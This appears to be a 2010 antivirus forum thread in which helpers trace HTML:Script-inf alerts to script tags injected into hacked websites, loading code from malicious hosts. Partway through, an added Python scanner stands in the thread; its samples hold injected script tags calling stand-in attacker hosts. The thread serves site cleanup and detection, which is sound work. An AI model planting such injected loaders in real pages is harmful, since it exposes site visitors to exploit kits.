Re: HTML:Script-inf on website

Help~ Can someone please check the site:
hxxp:happytailstucson.com

We have clients who use our site to log in and now have avast, and they are told it is malware with the following message: HTML:Script-inf

If you cannot check it, please let me know how I can check the site. I have looked and scanned all uploaded files and found nothing!

Thanks million!
Cinvan

NoVirusThanks - INFECTED
http://scanner.novirusthanks.org/analysis/7dc646f25ce6cd9828efd81edf44192e/aW5kZXg=/

VirusTotal - happytailstucson.com.htm - 7/41
http://www.virustotal.com/analisis/094ae96089fbaa86c4864a9c7a778683dbd4baad1f574f6a88d86227cf323bf7-1278190036

Wepawet - benign
http://wepawet.cs.ucsb.edu/view.php?hash=efac09ad5c81e2a6305383fa84cac3db&t=1278190990&type=js

UnmaskParasites - References to 1 suspicious domain found.
http://www.UnmaskParasites.com/security-report/?page=www.happytailspetservices.com

URLVoid

Report 2010-07-03 23:05:02 (GMT 1)
Website happytailspetservices.com
Domain Hash 0455f15839fb3e0e8f659e13e4975e58
IP Address 173.201.137.68 [SCAN]
IP Hostname ip-173-201-137-68.ip.secureserver.net
IP Country US (United States)
AS Number 26496
AS Name PAH-INC - GoDaddy.com, Inc.
Detections 1 / 17 (6 %)
Status SUSPICIOUS Scanning site with: Finjan DETECTED

VirusTotal - unp224562320.tmp - 7/41 - INFECTED
http://www.virustotal.com/analisis/094ae96089fbaa86c4864a9c7a778683dbd4baad1f574f6a88d86227cf323bf7-1278187804

The actual alert is on happytailspetservices.com, where data is imported from, and not on happytailstucson.com, see image1.

There is a script tag outside the closing html tag, a standards no-no and highly suspect. It is trying to run a javascript file from another site (which has nothing to do with yahoo), see image2. This is a malicious site which would be blocked by avast (image3) and firefox (image4); also see https://safeweb.norton.com/report/show?name=blackhulu.com.

So it looks like the happytailspetservices.com site has been hacked and the detection is most certainly correct.

Ohooo yes, that gave a different scan result... forgot to look at the URL in the avast popup :-[ Edited my scans above.

Yes, it is easy to ignore what is in front of your nose when the alert is apparently coming from a parent site ;D

@ cinvan1121
Now you have to contact the hacked site, or check it out if it is within your control, and remove the inserted script tag. More importantly, you need to close whatever vulnerability has allowed the site to be exploited/hacked.

Hi Pondus and DavidR,

That is why Unmask Parasites is such a good resource: it gives you all redirects, subdomains and links, and you have to check these separately as well. Scanners that only take the main domain fail to get all the malcode that way: happytailspetservices.com - but the infection and the suspicious script is at: assolkh.blackhulu.com suspicious - displaying 1 of 1

* <Script> link - htxp://assolkh.blackhulu.com:8080/Yahoo.js
Malicious software includes 31 exploits, 13 trojans, 1 scripting exploit.
Threat Name: Bloodhound.Exploit.292
Location: htxp://assolkh.blackhulu.com:8080/Applet1.html

This site was hosted on 1 network including AS7795 (NTELOSINC).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, blackhulu.com appeared to function as an intermediary for the infection of 12 sites including techmyhelp.com/, skyventure.com.my/, setdaccio.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 74 domains, including raidmax.com/, thavage.com/, vestonkhuongduy.com/,

polonus

P.S. Example of this iFrame injection here: htxp://jsunpack.jeek.org/dec/go?report=63af26934bd3bb5f3f7df4e128e4a7ea4b8eb332 (Open with NS active, malicious)
What is it? It comes courtesy of a java deployment toolkit - example:
2010/05/15_21:10 yoursoap.ru:8080/Applet1html 174.137.179.244 digit-colo.amsnl.webaircom. exploit for java deployment toolkit veerATmaillife.ru 36057
will only attempt to infect Internet Explorer and Google Chrome users, so use Fx with NS and RP active!

D

The final target and what malware might be on it is immaterial as avast doesn’t allow it to get anywhere near it.

The problem in this case, as far as the OP is concerned, is that avast alerts on their site happytailstucson.com, because a cross-site link from which data is imported, happytailspetservices.com, has been hacked, and it is that which avast is alerting on: it has been hacked with the insertion of the script tag.

We don’t really need to know what is on blackhulu.com as that could well change at the drop of a hat. We are trying to help the OP to resolve their problem which has nothing to do with the payload at blackhulu.com; that problem is the hacking of happytailspetservices.com.

If that problem is resolved then the final destination is immaterial; we don’t need to go to that depth to help the OP to resolve their problem other than say the detection is good.

Thanks so much! I was able to clean the site up. Now to figure out how the site has been hacked.
Thanks, once again.

Hi cinvan1121,

The site has been hacked via a java exploit, so check that you have the latest java there. It might well be that, thanks to avast, users never came even close to the malware (if there was an active payload at the time), because they were disconnected or alerted well in advance. Neither malcode nor exploits belong on a reputable website; they should be cleansed.

polonus

You’re welcome, happy hunting.

Try checking this out - Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.

Hi malware fighters,

This browser exploit malware is found in gigantic numbers, look here: we have about 614,000 results (0.30 seconds)
Just Googled for it: http://www.google.com/search?client=flock&channel=fds&q=8080%2FApplet1.html&ie=utf-8&oe=utf-8&aq=t
We reported a similar website infection here: http://forum.avast.com/index.php?topic=60161.msg517966#msg517966
And this is what it is: exploit for java deployment toolkit
Another one: betafleet.ru:8080/Applet1.html Threat name : Exploit JSE Webstart (type 1066)
And another one here: http://support.clean-mx.de/clean-mx/viruses?response=&id=563414
http://www.vupen.com/english/advisories/2010/0853
A testpage can be found here, but do not go there because of an avast alert:
htxp://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html

polonus

Hello There,

We are having a similar issue with the website wXw.osundefender.org; avast seems to be detecting the virus HTML:Script-Inf. I have run the website through a number of online scanners (Dr. Web, NoVirusThanks) and none seem to detect this... Could this be a case of Avast blacklisting the website? Please advise...

The css file that is called from the index page appears to have been hacked, see image1: apart from css instructions there is a script tag to an off-site URL, which is suspect, see image2. The same script tag is also at the end of the index.php page, causing avast to alert on that too, see image3.

See http://www.virustotal.com/analisis/2ede96821a8ba0d2c1847202a57a4ac97487c3af080f9f91e3f28d584655065b-1278884642 results of css file scan.

See http://www.virustotal.com/analisis/9e645c5ec194e6ae7cbaf9264f9f5930c17b904c56ba8ba4d632f26f51efe3a5-1278884817 results of scan of index.php page.

So it isn't only avast detecting this, though there are actually very few that even look for this type of thing, much less detect it.

The site that the script tag tries to run is one that avast considers a malicious site, image4. avast isn't the only one that considers this Russian site malicious, see http://www.mywot.com/en/scorecard/holasionweb.com.

Please ‘modify’ your post change the URL from http to hXXp or www to wXw, to break the link and avoid accidental exposure to suspect sites, thanks.
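Both injections discussed in this thread look the same from the defender's side: a `<script>` tag that loads from a host other than the site itself, either appended after the closing `</html>` tag or dropped into a file (a stylesheet) that should never contain markup. The following is an added example of how a site owner could check their own files for that pattern; it is not code from the original posts, and the sample page, stylesheet and the `malicious.example` hosts are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample index page: one legitimate local script, plus an injected
# remote <script> appended after </html>, as described in the thread.
SAMPLE_HTML = """<html><head><title>Pet services</title>
<link rel="stylesheet" href="/style.css">
<script src="/js/menu.js"></script></head>
<body><p>Welcome</p></body></html>
<script src="http://assolkh.malicious.example:8080/Yahoo.js"></script>
"""

# Constructed sample stylesheet carrying a script tag, which has no place in CSS.
SAMPLE_CSS = 'body { margin: 0 }\n<script src="http://holasion.malicious.example/js.php"></script>\n'

# Matches the src attribute of any <script ...> opening tag (quoted or bare).
SCRIPT_SRC = re.compile(r'<script\b[^>]*\ssrc\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)


def external_scripts(content, site_host):
    """Return (src, after_html_close) for each script src that is not on site_host.

    Relative URLs (no host) are treated as same-site and skipped; a tag that sits
    after the last </html> is flagged, since nothing legitimate belongs there."""
    close = content.lower().rfind("</html>")
    findings = []
    for m in SCRIPT_SRC.finditer(content):
        src = m.group(1)
        host = urlparse(src).hostname  # None for /js/menu.js, set for //host/x too
        if host is None or host.lower() == site_host.lower():
            continue
        findings.append((src, close != -1 and m.start() > close))
    return findings


def css_has_markup(css):
    """A stylesheet should never contain a <script> tag; any hit indicates injection."""
    return re.search(r"<script\b", css, re.IGNORECASE) is not None


if __name__ == "__main__":
    for src, trailing in external_scripts(SAMPLE_HTML, "www.example.org"):
        where = "after </html>" if trailing else "inside the document"
        print(f"off-site script {src} ({where})")
    print("stylesheet contains markup:", css_has_markup(SAMPLE_CSS))
```

Run it against the files you control (not the live remote script) and treat every off-site hit you did not put there as a sign the site, not the scanner, is the problem.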

Well the sublink is there on unmasked parasites:
The last time Google visited this site was on 2010-05-21, and the last time suspicious content was found on this site was on 2010-05-20.

Malicious software includes 109 scripting exploits, 1 trojan.

This site was hosted on 4 network(s) including AS50108 (KALUGANET), AS16276 (OVH), AS2588 (LATNETSERVISS).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, holasionweb.com appeared to function as an intermediary for the infection of 3 sites including ffl.org/, cosmicbooknews.com/, 365dailynews.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software and it infected 35 domains, including moomha.com/, venciclopedia.com/, pattonwebz.com/. (the last one was reported by me on the avast forums - pol)

It is called the holasion.com virus: http://tintation.com/2010/05/13/remove-holasionweb-com-virus-malware/
GoDaddy PHP was at the crux of the problem; it started there earlier. More on this infection from Sucuri here:
http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using-holasionweb-com.html

pol

Hi abdkabit,

You also have to scan all these here: http://www.urlvoid.com/find-parasites/

pol

Thanks guys. May I ask, which is the preferred option for removing this virus:

Thanks a lot for the analysis…

Welcome to StopBadware
http://stopbadware.org/home/index

Tips for Cleaning & Securing Your Website
http://stopbadware.org/home/security

Hi,

Avast Free Antivirus 5 gives an HTML:Script-inf virus alert for the webpage: wxw.sajtorandevu.hu

I had it checked with the designer, but there is no code that is wrong there, and we cannot figure out the problem. How could I find out what this script is that might bother Avast?

Hi NLQ, welcome to the forum :slight_smile:

Please can you deactivate the link, change www to wXw, to prevent others potentially becoming infected.

The alert is caused by a script in the page, highlighted in the image.

http://www.UnmaskParasites.com/security-report/?page=www.sajtorandevu.hu

It needs to be removed.